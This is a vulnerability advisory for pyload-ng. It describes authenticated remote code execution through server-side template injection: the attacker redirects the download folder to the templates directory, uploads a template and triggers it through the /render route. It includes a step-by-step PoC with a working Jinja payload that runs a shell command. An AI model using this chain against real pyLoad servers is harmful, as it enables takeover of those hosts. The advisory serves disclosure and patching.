PT-2026-53567 · Pypi · Pyload-Ng

Published

2026-06-29

·

Updated

2026-06-29

CVSS v3.1

9.1

Critical

VectorAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Summary

An authenticated user can change the download folder and upload a crafted template to the specified folder lead to remote code execution

Details

example version: 0.5 file:src/pyload/webui/app/blueprints/app blueprint.py
python
@bp.route("/render/<path:filename>", endpoint="render")
def render(filename):
  mimetype = mimetypes.guess type(filename)[0] or "text/html"
  data = render template(filename)
  return flask.Response(data, mimetype=mimetype)
So, if we can control file in the path "pyload/webui/app/templates" in latest version and path in "module/web/media/js"(the difference is the older version0.4.20 only renders file with extension name ".js"), the render template func will works like SSTI(server-side template injection) when render the evil file we control.
in /settings page and the choose option general/general, where we can change the download folder. image
Also, we can find the pyLoad install folder in /info page image So, we can change the value of Download folder to the template path. Then through /json/add package we can upload a crafted template file to RCE.
python
@bp.route("/json/add package", methods=["POST"], endpoint="add package")
# @apiver check
@login required("ADD")
def add package():
  api = flask.current app.config["PYLOAD API"]

  package name = flask.request.form.get("add name", "New Package").strip()
  queue = int(flask.request.form["add dest"])
  links = [l.strip() for l in flask.request.form["add links"].splitlines()]
  pw = flask.request.form.get("add password", "").strip("
r")

  try:
    file = flask.request.files["add file"]

    if file.filename:
      if not package name or package name == "New Package":
        package name = file.filename

      file path = os.path.join(
        api.get config value("general", "storage folder"), "tmp " + file.filename
      )
      file.save(file path)
      links.insert(0, file path)

  except Exception:
    pass

  urls = [url for url in links if url.strip()]
  pack = api.add package(package name, urls, queue)
  if pw:
    data = {"password": pw}
    api.set package data(pack, data)

  return jsonify(True)

PoC

First login into the admin page, then visit the info page to get the path of pyload installation folder. Second, change the download folder to PYLOAD INSTALL DIR/ webui/app/templates/ Third, upload crafted template file through /json/add package through parameter add file the content of crafted template file and its filename is "341.html":
{{x. init . globals [' builtins ']['eval'](" import ('os').popen('whoami').read()")}}
image Last, visit http://TARGET/render/tmp 341.html to trigger the RCE image image

Impact

It is a RCE vulnerability and I think it affects all versions. In earlier version 0.4.20, the trigger difference is the pyload installation folder path difference and the upload file must with extension ".js" . The render js code in version 0.4.20:
python
@route("/media/js/<path:re:.+.js>")
def js dynamic(path):
  response.headers['Expires'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT",
                        time.gmtime(time.time() + 60 * 60 * 24 * 2))
  response.headers['Cache-control'] = "public"
  response.headers['Content-Type'] = "text/javascript; charset=UTF-8"

  try:
    # static files are not rendered
    if "static" not in path and "mootools" not in path:
      t = env.get template("js/%s" % path)
      return t.render()
    else:
      return static file(path, root=join(PROJECT DIR, "media", "js"))
  except:
    return HTTPError(404, "Not Found")

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

Related Identifiers

PYSEC-2026-492

Affected Products

Pyload-Ng